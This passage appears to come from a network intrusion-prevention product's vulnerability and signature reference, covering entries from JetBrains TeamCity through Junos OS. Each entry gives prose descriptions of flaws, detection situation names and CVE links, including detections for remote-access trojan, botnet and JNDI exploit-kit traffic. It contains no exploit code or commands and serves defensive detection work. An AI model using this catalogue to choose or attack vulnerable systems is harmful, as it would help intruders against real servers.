Situation: HTTP_CRL-JetBrains-TeamCity-Commit-Status-Publisher-Page-Stored-Cross-Site-Scripting
References:
CVE-2023-34220
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34220
Back to top

JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: High
First detected in: sgpkg-ips-1636-5242
Last changed: sgpkg-ips-1636-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: A reflected cross-site scripting vulnerability has been reported for JetBrains TeamCity. The vulnerability is due to improper validation on HTTP requests when copying build steps. A remote attacker could exploit the vulnerability by enticing a victim to open a crafted link. Successful exploitation could result in execution of arbitrary script code in the victim's browser.
Situation: HTTP_CSU-JetBrains-TeamCity-Copy-Build-Step-Reflected-Cross-Site-Scripting
References:
CVE-2023-41249
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-41249
Back to top

JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1605-5242
Last changed: sgpkg-ips-1605-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported for JetBrains TeamCity. This vulnerability is due to improper input validation on the GitLab connection page. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in arbitrary code execution in the context of the victim's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-Gitlab-Connection-Stored-Cross-Site-Scripting
References:
CVE-2023-34229
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34229
Back to top

JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1810-5242
Last changed: sgpkg-ips-1810-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper input validation in the "Global Settings" component causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-Global-Settings-Stored-Cross-Site-Scripting
References:
CVE-2024-47951
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47951
Back to top

JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: High
First detected in: sgpkg-ips-1723-5242
Last changed: sgpkg-ips-1723-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Malfunction
Description: An authentication bypass vulnerability exists in JetBrains TeamCity. The vulnerability is due to improper authentication of requests of JSP files. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted requests to the target server. Successful exploitation could result in an attacker bypassing authentication mechanisms leading to, in the worst case, arbitrary code execution under the security context of the target server.
Situation: HTTP_CRL-JetBrains-TeamCity-Jspprecompilation-Authentication-Bypass-CVE-2024-23917
References:
CVE-2024-23917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-23917
Back to top

JetBrains-TeamCity-Path-Traversal-CVE-2024-27199

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: High
First detected in: sgpkg-ips-1700-5242
Last changed: sgpkg-ips-1700-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Directory Traversal
Description: A path traversal vulnerability has been reported in JetBrains TeamCity versions before 2023.11.4. An unauthenticated remote attacker may use this vulnerability to access certain authenticated endpoints, allowing for information disclosure and limited configuration modification.
Situation: HTTP_CSU-JetBrains-TeamCity-Path-Traversal-CVE-2024-27199
References:
CVE-2024-27199
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-27199
Back to top

JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1586-5242
Last changed: sgpkg-ips-1586-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper validation of user data causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary escripts in a user's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-Perforce-Connection-Stored-Cross-Site-Scripting
References:
CVE-2022-48426
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48426
Back to top

JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039

About this vulnerability: A vulnerability in Jetbrains Teamcity
Risk: High
First detected in: sgpkg-ips-1353-5242
Last changed: sgpkg-ips-1353-5242
Platform: Windows
Software: JetBrains TeamCity
Type: Malfunction
Description: There exists a remote code execution vulnerability in JetBrains TeamCity. Successful exploitation could lead in arbitrary code execution.
Situation: File-Text_JetBrains-TeamCity-Remote-Code-Execution-CVE-2019-15039
References:
CVE-2019-15039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15039
Back to top

JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1584-5242
Last changed: sgpkg-ips-1584-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper validation of user data in the SSH keys page causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-SSH-Keys-Page-Stored-Cross-Site-Scripting
References:
CVE-2022-48428
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48428
Back to top

JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in JetBrains TeamCity
Risk: Moderate
First detected in: sgpkg-ips-1838-5242
Last changed: sgpkg-ips-1838-5242
Platform: Generic
Software: JetBrains TeamCity
Type: Input Validation
Description: Improper input validation in the Vault Connection component causes a cross-site scripting vulnerability in JetBrains TeamCity. A successful exploitation allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-JetBrains-TeamCity-Vault-Connection-Stored-Cross-Site-Scripting
References:
CVE-2025-24459
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24459
Back to top

Jetty-File-Disclosure-CVE-2021-28169

About this vulnerability: A vulnerability in Jetty
Risk: Moderate
First detected in: sgpkg-ips-1502-5242
Last changed: sgpkg-ips-1502-5242
Platform: Generic
Software: Jetty Web Server
Type: Input Validation
Description: A file disclosure vulnerability has been reported in Jetty versions up to 9.4.40, 10.0.2, and 11.0.2. A remote attacker can exploit this vulnerability by providing a path that contains double encoded characters. Successful exploitation allows bypassing the restrictions set to protect the contents of WEB-INF and META-INF directories.
Situation: HTTP_CSU-Jetty-File-Disclosure-CVE-2021-28169
References:
CVE-2021-28169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-28169
Back to top

Jetty-Web-INF-File-Disclosure

About this vulnerability: A vulnerability in Jetty Web Server
Risk: High
First detected in: sgpkg-ips-1428-5242
Last changed: sgpkg-ips-1843-5242
Platform: Generic
Software: Jetty Web Server
Type: Input Validation
Description: A vulnerability in Jetty Web Server, versions 9.4.37.v20210219, 9.4.38.v20210224 and 9.4.37-9.4.42, 10.0.1-10.0.5, 11.0.1-11.0.5, which allows remote attackers to access files in the WEB-INFO directory by using encoded characters in the URI. Detection is for CVE-2021-34429 which includes the variant CVE-2021-28164.
Situation: HTTP_CSU-Jetty-Web-INF-File-Disclosure
References:
CVE-2021-34429
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-34429
Back to top

Jimcrat-Remote-Access-Tool

About this vulnerability: Jimcrat RAT
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Windows
Software: <os>
Type: Code Injection
Description: Jimcrat is a malicious RAT that infects Windows-based systems.
Situation: Generic_CS-Jimcrat-Windows-Infection-Traffic
Back to top

Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450

About this vulnerability: A vulnerability in JimuReport
Risk: High
First detected in: sgpkg-ips-1836-5242
Last changed: sgpkg-ips-1836-5242
Platform: Generic
Software: JimuReport
Type: Input Validation
Description: A server-side template injection has been reported in JimuReport versions up to and including 1.6.0. An unauthenticated attacker can use this vulnerability to execute arbitrary commands via FreeMarker engine expressions.
Situation: HTTP_CRL-Jimureport-Freemarker-Server-Side-Template-Injection-CVE-2023-4450
References:
CVE-2023-4450
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4450
Back to top

JNDI-Exploit-Kit-Traffic

About this vulnerability: JNDI Exploit Kit traffic detected
Risk: High
First detected in: sgpkg-ips-1417-5242
Last changed: sgpkg-ips-1417-5242
Platform: Generic
Software: <os>
Type: Malfunction
Description: JNDI Exploit Kit traffic detected. JEK can be used to deliver a payload to the exploited system via LDAP protocol.
Situation: LDAP_SS-JNDI-Exploit-Kit-Traffic
Back to top

Johnson-Controls-CK720-Commands

About this vulnerability: Configuration commands related with Johnson Controls CK720 operation
Risk: Moderate
First detected in: sgpkg-ips-616-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Johnson Controls CK720
Type: Misconfiguration
Description: User commands related with Johnson Controls CK720 network controller. Detecting these commands may indicate unauthorized access to facility management tools.
Situation: Telnet_Johnson-Controls-CK720-Reboot-Attempt
Telnet_Johnson-Controls-CK720-Date-Time-Change
Telnet_Johnson-Controls-CK720-Successful-Password-Change
Telnet_Johnson-Controls-CK720-Successful-Login
Back to top

Joizeparc-Botnet

About this vulnerability: Joizeparc botnet
Risk: High
First detected in: sgpkg-ips-1355-5242
Last changed: sgpkg-ips-1355-5242
Platform: Linux
Software: <os>
Type: Code Injection
Description: Joizeparc is a worm that infects Linux-based systems.
Situation: Generic_CS-Joizeparc-Linux-Infection-Traffic
Back to top

Joltid-Peerenabler

About this vulnerability: Joltid PeerEnabler
Risk: Low
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Joltid PeerEnabler
Type: Misconfiguration
Description: Joltid PeerEnabler is a peer-to-peer program. It is not a virus or a Trojan, however it is considered a potentially unwanted program.
Situation: HTTP_CSH-Joltid-Peerenabler
Back to top

Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities

About this vulnerability: A vulnerability in Joomla!
Risk: High
First detected in: sgpkg-ips-1388-5242
Last changed: sgpkg-ips-1388-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: SQL injection vulnerabilities have been reported in multiple Joomla! CMS Components.
Situation: HTTP_CRL-Joomla!-CMS-Multiple-SQL-Injection-Vulnerabilities
References:
CVE-2018-5974
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-5974
Back to top

Joomla!-CMS-User-Notes-List-View-SQL-Injection

About this vulnerability: A vulnerability in Joomla!
Risk: Moderate
First detected in: sgpkg-ips-1129-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: An SQL injection vulnerability has been reported in the User Notes component of Joomla! CMS. The vulnerability is due to a lack of type casting of a variable in an SQL statement in the User Notes list view. A remote, authenticated attacker can exploit this vulnerability by sending a crafted request to the target server. Successful exploitation results in the execution of crafted SQL queries against the underlying database.
Situation: HTTP_CRL-Joomla!-CMS-User-Notes-List-View-SQL-Injection
References:
CVE-2018-8045
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8045
Back to top

Joomla!-CMS-Webservice-Authentication-Bypass

About this vulnerability: A vulnerability in Joomla! CMS
Risk: High
First detected in: sgpkg-ips-1614-5242
Last changed: sgpkg-ips-1614-5242
Platform: Generic
Software: Joomla
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Joomla! CMS. The vulnerability is due to improper request parameters sanitization when accessing the Webservice API. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the vulnerable API. Successful exploitation could lead to the disclosure of sensitive information.
Situation: HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass
HTTP_CRL-Joomla!-CMS-Webservice-Authentication-Bypass-Sensitive-File-Access
References:
CVE-2023-23752
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-23752
Back to top

Joomla-Akeeba-Kickstart-Remote-Code-Execution

About this vulnerability: A Joomla Akeeba Kickstart Remote Code Execution Vulnerability.
Risk: High
First detected in: sgpkg-ips-696-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Insecure Configuration
Description: A vulnerability in Joomla Akeeba Kickstart, in various versions, which allow remote attackers to bypass encryption and execute arbitrary code by the use of a crafted command message which will extract an archive from a remote location.
Situation: HTTP_CRL-Joomla-Akeeba-Kickstart-Remote-Code-Execution
References:
CVE-2014-7228
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7228
Back to top

Joomla-Arbitrary-File-Upload

About this vulnerability: A Joomla Arbitrary File Upload vulnerability.
Risk: High
First detected in: sgpkg-ips-700-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: A vulnerability in Joomla, versions 2.5.x before 2.5.14 and 3.x before 3.1.5, which allows remote attackers to bypass access restrictions and upload arbitrary files using a trailing "." (dot), possibly resulting in arbitrary code execution.
Situation: HTTP_CS-Joomla-Arbitrary-File-Upload
References:
CVE-2013-5576
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5576
BID-61582
http://www.securityfocus.com/bid/61582
Back to top

Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting

About this vulnerability: An attempt to exploit a vulnerability in Joomla CMS detected.
Risk: High
First detected in: sgpkg-ips-1706-5242
Last changed: sgpkg-ips-1706-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: A vulnerability in Joomla CMS, versions 3.7.0 through 3.10.15-elts, 4.x.x prior to 4.4.3, 5.x.x prior to 5.0.3, which allows attackers to execute arbitrary code in a victim's browser, due to insufficient filtering of HTML tags in user provided data.
Situation: HTTP_CS-Joomla-CMS-CleanTags-Reflected-Cross-Site-Scripting
References:
CVE-2024-21726
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21726
Back to top

Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Joomla! CMS
Risk: Moderate
First detected in: sgpkg-ips-1317-5242
Last changed: sgpkg-ips-1317-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Joomla! CMS Core. The vulnerability is due to improper validation of the title parameter in the mod_breadcrumbs module. A remote, authenticated attacker can exploit the vulnerability by sending a crafted request to the server. Successful exploitation could result in the execution of arbitrary script code in the target user's browser.
Situation: HTTP_CRL-Joomla-CMS-Mod_breadcrumbs-Title-Stored-Cross-Site-Scripting
References:
CVE-2021-23124
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23124
Back to top

Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Joomla! CMS
Risk: Moderate
First detected in: sgpkg-ips-1313-5242
Last changed: sgpkg-ips-1313-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: Improper validation of the link parameter in the mod_random_image module vauses a cross-site scripting vulnerability in Joomal. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Joomla-CMS-Mod_Random_Image-Link-Stored-Cross-Site-Scripting
References:
CVE-2020-15696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-15696
Back to top

Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities

About this vulnerability: A vulnerability in Joomla! Joomla!
Risk: Moderate
First detected in: sgpkg-ips-819-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: Improper handling of request parameters causes a policy bypass and privilege escalation vulnerability in the Joomla CMS. Successful exploitation allows an attacker to access functionality that has been disabled by policies.
Situation: HTTP_CS-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
HTTP_CRL-Joomla-CMS-Policy-Bypass-And-Privilege-Escalation-Vulnerabilities
References:
CVE-2016-8869
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-8869
Back to top

Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting

About this vulnerability: A vulnerability in Joomla
Risk: Moderate
First detected in: sgpkg-ips-1343-5242
Last changed: sgpkg-ips-1343-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: Improper validation of the logoFile parameter in the error.php of the Protostar template causes a cross-site scripting vulnerability in Joomla. A successful exploit allows an attacker to execute arbitrary scripts in a user's browser.
Situation: HTTP_CRL-Joomla-CMS-Protostar-Template-Error-Stored-Cross-Site-Scripting
References:
CVE-2021-26030
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26030
Back to top

Joomla-Com_Fields-SQL-Injection

About this vulnerability: A vulnerability in Joomla!
Risk: High
First detected in: sgpkg-ips-919-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: There exists an SQL injection vulnerability in Joomla!. A remote, unauthenticated attacker could use this to gain sensitive information.
Situation: HTTP_CRL-Joomla-Com_Fields-SQL-Injection
References:
CVE-2017-8917
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8917
Back to top

Joomla-Content-History-SQL-Injection

About this vulnerability: A Joomla Content History SQL Injection vulnerability
Risk: High
First detected in: sgpkg-ips-775-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: SQL Injection
Description: A vulnerability in Joomla, versions 3.2 to 3.4.4, in the getListQuery function, which allows remote attackers to execute arbitrary SQL commands via the list[select] parameter to index.php. CVE-2015-7857 CVE-2015-7858 are covered.
Situation: HTTP_CRL-Joomla-Content-History-SQL-Injection
References:
CVE-2015-7297
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7297
Back to top

Joomla-JoomlaWorks-AllVideos-Directory-Traversal-Disclosure

About this vulnerability: JoomlaWorks AllVideos allows remote attacker to read arbitrary files
Risk: Moderate
First detected in: sgpkg-ips-289-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Malfunction
Description: A remote file disclosure vulnerability exists in JoomlaWorks AllVideos. The vulnerability allows a remote attacker to execute a directory traversal attack and thus download and view arbitrary files.
Situation: HTTP_CSU-Joomla-AllVideos-File-Disclosure
References:
CVE-2010-0606
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0606
BID-38238
http://www.securityfocus.com/bid/38238
OSVDB-62331
http://www.osvdb.org/62331
Back to top

Joomla-Remote-Code-Execution-Vulnerability

About this vulnerability: A vulnerability in Joomla
Risk: High
First detected in: sgpkg-ips-713-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Input Validation
Description: There is a critical remote code execution vulnerability in Joomla Core. Joomla! CMS versions 1.5.0 through 3.4.5 do not properly filter browser information when session values are saved into the database which leads to a remote code execution vulnerability.
Situation: HTTP_CSH-Joomla-Remote-Code-Execution-Vulnerability
References:
CVE-2015-8562
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8562
Back to top

Joomla-TinyBrowser-File-Upload-Code-Execution

About this vulnerability: A Joomla TinyBrowser File Upload Code Execution vulnerability.
Risk: High
First detected in: sgpkg-ips-710-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: TinyBrowser
Type: Input Validation
Description: A vulnerability in Joomla TinyBrowser, version 1.5.12, which allows remote attackers to upload arbitrary PHP files, resulting in code execution, due to the insufficient file type validation.
Situation: HTTP_CS-Joomla-TinyBrowser-File-Upload-Code-Execution
References:
CVE-2011-4908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4908
OSVDB-64578
http://www.osvdb.org/64578
Back to top

Joomla-TinyMCE-File-Upload-Remote-Code-Execution

About this vulnerability: A vulnerability in Joomla TinyMCE file uploads
Risk: Moderate
First detected in: sgpkg-ips-614-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Code Injection
Description: There is a vulnerability in some versions of Joomla where malicious file upload via TinyMCE content editor may be used for remote code execution.
Situation: HTTP_CSU-Joomla-TinyMCE-File-Upload-Remote-Code-Execution
Back to top

Joomla-Webring-Remote-File-Include-Vulnerability

About this vulnerability: Joomla Webring Remote File Include Vulnerability
Risk: High
First detected in: sgpkg-ips-343-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Joomla
Type: Input Validation
Description: The Webring component for Joomla! is prone to a remote file-include vulnerability. Successful exploitation of the issue allows the attacker to compromise the application and the remote system.
Situation: HTTP_CRL-Joomla-Webring-Remote-Code-Injection-Compromise
References:
CVE-2006-4129
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4129
BID-19492
http://www.securityfocus.com/bid/19492
Back to top

Joplin-Mdtohtml-Cross-Site-Scripting

About this vulnerability: A vulnerability in Joplin Project Joplin
Risk: Moderate
First detected in: sgpkg-ips-1578-5242
Last changed: sgpkg-ips-1578-5242
Platform: Generic
Software: Joplin
Type: Input Validation
Description: A cross-site scripting vulnerability has been reported in the MdToHtml component of Joplin. This vulnerability is due to improper validation and escaping of the language selector in markdown code block element. A remote attacker could exploit this vulnerability by enticing a victim to open a crafted markdown document. Successful exploitation could allow the attacker to execute arbitrary code under the security context of the user.
Situation: File-Text_Joplin-Mdtohtml-Cross-Site-Scripting
References:
CVE-2022-45598
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45598
Back to top

Jorani-Unauthenticated-Remote-Code-Execution

About this vulnerability: An attempt to exploit a vulnerability in Jorani detected
Risk: High
First detected in: sgpkg-ips-1669-5242
Last changed: sgpkg-ips-1669-5242
Platform: Generic
Software: Jorani
Type: Input Validation
Description: A vulnerability in Jorani, versions before 1.0.2, which allows remote attackers to execute arbitrary code by using a path traversal, due to insufficient input validation.
Situation: HTTP_CRL-Jorani-Unauthenticated-Remote-Code-Execution
References:
CVE-2023-26469
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-26469
Back to top

JPEG_Data-After-End-Of-Image-Marker

About this vulnerability: Data after the JPEG End-Of-Image marker
Risk: Moderate
First detected in: sgpkg-ips-666-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Code Injection
Description: The end of a JPEG file is marked with the End-Of-Image marker. Some malware inject data after the marker to use as a communication channel.
Back to top

JPG-Gdiplus-DLL-Comment-Buffer-Overflow

About this vulnerability: gdiplus.dll buffer overflow with invalid comment length in jpeg images
Risk: High
First detected in: sgpkg-ips-10-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: The JPEG image parser gdiplus.dll contains a buffer overflow vulnerability. JPEG images with a comment section, which length is set as 0 or 1, will cause an integer underflow and possibly allow arbitrary code execution.
Situation: HTTP_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
E-Mail_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
File-JPEG_JPG-Gdiplus-DLL-Comment-Buffer-Overflow
References:
CVE-2004-0200
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0200
MS04-028
http://technet.microsoft.com/security/bulletin/MS04-028
Back to top

jQuery-Cross-Site-Scripting-CVE-2020-11023

About this vulnerability: A vulnerability in jQuery
Risk: High
First detected in: sgpkg-ips-1830-5242
Last changed: sgpkg-ips-1830-5242
Platform: Generic
Software: jQuery
Type: Cross-site Scripting
Description: A cross site scripting vulnerability exists in jQuery versions between 1.0.3 and 3.4.1. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user into visiting a malicious website. Successful exploitation could allow arbitrary code execution in the context of the target user's browser.
Situation: File-Text_jQuery-Cross-Site-Scripting-CVE-2020-11023
References:
CVE-2020-11023
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11023
Back to top

JSFuck-JavaScript-Obfuscation

About this vulnerability: JSFuck Javascript obfuscation usage detected
Risk: High
First detected in: sgpkg-ips-1147-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Javascript Injection
Description: JSFuck is valid Javascript code written using only six different characters. This makes the code highly obfuscated and it might allow to bypass restrictions or detections.
Situation: File-Text_JSFuck-JavaScript-Obfuscation
Back to top

JSON-Object-With-Unnecessarily-Escaped-Characters

About this vulnerability: A suspicious JSON object detected
Risk: High
First detected in: sgpkg-ips-1774-5242
Last changed: sgpkg-ips-1775-5242
Platform: Generic
Software: Any Software
Type: Input Validation
Description: This fingerprint detects obfuscated JSON objects. Strings in JSON objects can be obfuscated using Unicode escaping. For example, character 'a' may be represented as "\u0061". Such obfuscated JSON values are usually used to bypass security filtering during attacks.
Situation: File-Text_JSON-Object-With-Unnecessarily-Escaped-Characters
Back to top

Judge0-Sandbox-Escape-CVE-2024-28189

About this vulnerability: A vulnerability in Judge0
Risk: Moderate
First detected in: sgpkg-ips-1805-5242
Last changed: sgpkg-ips-1805-5242
Platform: Generic
Software: Judge0
Type: Input Validation
Description: Improper validation of data sent to an API endpoint causes a sandbox escape vulnerability in Judge0. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CRL-Judge0-Sandbox-Escape-CVE-2024-28189
References:
CVE-2024-28189
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-28189
Back to top

Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Juniper Networks' SSL-VPN Client
Risk: High
First detected in: sgpkg-ips-262-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Juniper Networks SSL-VPN Client
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Juniper Networks SSL-VPN Client. The vulnerability is due to an error in the setup ActiveX control. A particular setup parameter suffers insufficient input validation. An exploitation may lead to arbitrary code exectution in the context of the current user.
Situation: HTTP_SS-Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
File-Text_Juniper-SSL-VPN-Client-Setup-ActiveX-Control-Buffer-Overflow
References:
CVE-2006-2086
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2086
BID-17712
http://www.securityfocus.com/bid/17712
OSVDB-25001
http://www.osvdb.org/25001
Back to top

Junos-OS-J-Web-Arbitrary-File-Upload-CVE-2023-36846

About this vulnerability: An attempt to exploit a vulnerability in Junos OS detected
Risk: High
First detected in: sgpkg-ips-1629-5242
Last changed: sgpkg-ips-1802-5242
Platform: Junos OS
Software: <os>
Type: Input Validation
Description: A missing authentication for critical function vulnerability in Juniper Networks Junos OS on SRX Series allows an unauthenticated, network-based attacker to cause limited impact to the file system integrity. With a specific request that does not require authentication an attacker is able to upload arbitrary files via J-Web, leading to a loss of integrity for a certain part of the file system. This vulnerability could be chained with CVE-2023-36845 to achieve remote code execution.
Situation: HTTP_CRL-Junos-OS-J-Web-Arbitrary-File-Upload-PHP-External-Variable-Modification
References:
CVE-2023-36846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36846
Back to top

Junos-OS-J-Web-PHP-External-Variable-Modification-CVE-2023-36845

About this vulnerability: An attempt to exploit a vulnerability in Junos OS detected
Risk: High
First detected in: sgpkg-ips-1802-5242
Last changed: sgpkg-ips-1802-5242
Platform: Junos OS
Software: <os>
Type: Input Validation
Description: A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on SRX Series allows an unauthenticated, remote attacker to execute code by modifying value of the PHPRC variable.
Situation: HTTP_CRL-Junos-OS-J-Web-Arbitrary-File-Upload-PHP-External-Variable-Modification
References:
CVE-2023-36845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36845
Back to top

Junos-OS-Local-File-Inclusion-CVE-2022-22246

About this vulnerability: A vulnerability in Junos OS
Risk: Moderate
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Junos OS
Software: <os>
Type: Input Validation
Description: A local file inclusion vulnerability has been reported in the J-Web component of Junos OS. A remote attacker can use this vulnerability to execute PHP files located on the server.
Situation: HTTP_CSU-Junos-OS-Local-File-Inclusion-CVE-2022-22246
References:
CVE-2022-22246
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22246
Back to top

Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245

About this vulnerability: An attempt to exploit a vulnerability in Junos OS detected
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Junos OS
Software: <os>
Type: Input Validation
Description: The vulnerability is caused by the lack of input validation in /Upload.php endpoint of Juniper's J-Web. As a result, an unauthenticated attacker could create files in any place on the server.
Situation: HTTP_CRL_Junos-OS-Path-Traversal-During-File-Upload-CVE-2022-22245
References:
CVE-2022-22245
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22245
Back to top

Junos-OS-Phar-File-Deserialization-CVE-2022-22241

About this vulnerability: A vulnerability in Junos OS
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Junos OS
Software: <os>
Type: Input Validation
Description: An input validation vulnerability has been reported in the J-Web component of Junos OS. A remote attacker can use this vulnerability to deserialize phar files, which then can be further leveraged to achieve remote code execution.
Situation: HTTP_CRL-Junos-OS-Phar-File-Deserialization-CVE-2022-22241
References:
CVE-2022-22241
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22241
Back to top

Junos-Pre-Authenticated-Reflected-XSS-On-Error-Page-CVE-2022-22242

